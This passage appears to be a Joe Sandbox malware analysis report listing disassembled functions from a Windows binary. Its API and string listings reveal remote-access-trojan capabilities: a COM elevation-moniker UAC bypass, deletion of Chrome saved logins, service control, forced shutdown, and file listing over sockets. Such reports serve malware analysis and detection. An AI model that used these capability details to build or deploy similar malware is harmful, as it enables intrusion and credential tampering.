                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Object_wcslen
                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                        • API String ID: 240030777-3166923314
                                        • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                        • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                        • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                        • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                        Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                        • GetLastError.KERNEL32 ref: 00419945
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                        • String ID:
                                        • API String ID: 3587775597-0
                                        • Opcode ID: 3890bdb0540eb0e670ed260973a12fdff1d758257f1b422d234bde2ff04c0bf6
                                        • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                        • Opcode Fuzzy Hash: 3890bdb0540eb0e670ed260973a12fdff1d758257f1b422d234bde2ff04c0bf6
                                        • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                        Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 2341273852-0
                                        • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                        • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                        • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                        • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                        Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                        • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                        • API String ID: 2127411465-314212984
                                        • Opcode ID: e40e0e492563d2c27dc049d7b387231c440f41e8a0c0508c2b9921386633d4df
                                        • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                        • Opcode Fuzzy Hash: e40e0e492563d2c27dc049d7b387231c440f41e8a0c0508c2b9921386633d4df
                                        • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                        Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                        • GetLastError.KERNEL32 ref: 0040B261
                                        Strings
                                        • [Chrome StoredLogins not found], xrefs: 0040B27B
                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                        • UserProfile, xrefs: 0040B227
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 2018770650-1062637481
                                        • Opcode ID: 6231a6ec8c0bf8e98c8684e8dd9bafedce4a0939dadfa85d19fb30db5e755b14
                                        • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                        • Opcode Fuzzy Hash: 6231a6ec8c0bf8e98c8684e8dd9bafedce4a0939dadfa85d19fb30db5e755b14
                                        • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                        Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                        • GetLastError.KERNEL32 ref: 00416B02
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                        • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                        • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                        • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                        Function 00452F10 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: c9c150e801306c30e3e6fd676bf91ab99d53cd06d8b99a70f0bcb8a83e562639
                                        • Instruction ID: e307a384b629b95ff6fef94050d5be06a037bb5012f5a6d22b447047531b26ff
                                        • Opcode Fuzzy Hash: c9c150e801306c30e3e6fd676bf91ab99d53cd06d8b99a70f0bcb8a83e562639
                                        • Instruction Fuzzy Hash: 1FC27071E046288FDB25CE28CD447EAB3B5EB44346F1441EBD84DE7242E778AE898F45
                                        Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 004089AE
                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000328,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                          • Part of subcall function 00404468: SetEvent.KERNEL32(00000328,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                          • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                          • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                          • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                        • String ID:
                                        • API String ID: 4043647387-0
                                        • Opcode ID: b6d780576700f4933a9aaca3c1beff4f868690156509575001d11b963eafbbf9
                                        • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                        • Opcode Fuzzy Hash: b6d780576700f4933a9aaca3c1beff4f868690156509575001d11b963eafbbf9
                                        • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                        Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                        • String ID:
                                        • API String ID: 276877138-0
                                        • Opcode ID: 6d0f589b7f4ed5c193fffaa70fef351a53496163331b96a9b3d3840ad54bf661
                                        • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                        • Opcode Fuzzy Hash: 6d0f589b7f4ed5c193fffaa70fef351a53496163331b96a9b3d3840ad54bf661
                                        • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                        Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Find$CreateFirstNext
                                        • String ID: @CG$XCG$>G
                                        • API String ID: 341183262-3030817687
                                        • Opcode ID: bdf19f3600ef3cc3e8fbade951765131cd50cae54f5c0b8e5a05de1674f7c19c
                                        • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                        • Opcode Fuzzy Hash: bdf19f3600ef3cc3e8fbade951765131cd50cae54f5c0b8e5a05de1674f7c19c
                                        • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                        Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                          • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                          • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                          • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                          • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                        • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                        • String ID: PowrProf.dll$SetSuspendState
                                        • API String ID: 1589313981-1420736420
                                        • Opcode ID: 9a2ea4b760d1687da6394f818f94bf6b74c7e65cca45165fb093390337838f86
                                        • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                        • Opcode Fuzzy Hash: 9a2ea4b760d1687da6394f818f94bf6b74c7e65cca45165fb093390337838f86
                                        • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                        Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                        • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                        • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                        • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                        • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                        Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                        • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                        • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                        • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                        • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                        • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                        • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                        Function 004513C7 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F3B
                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                        • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                        • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                        • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
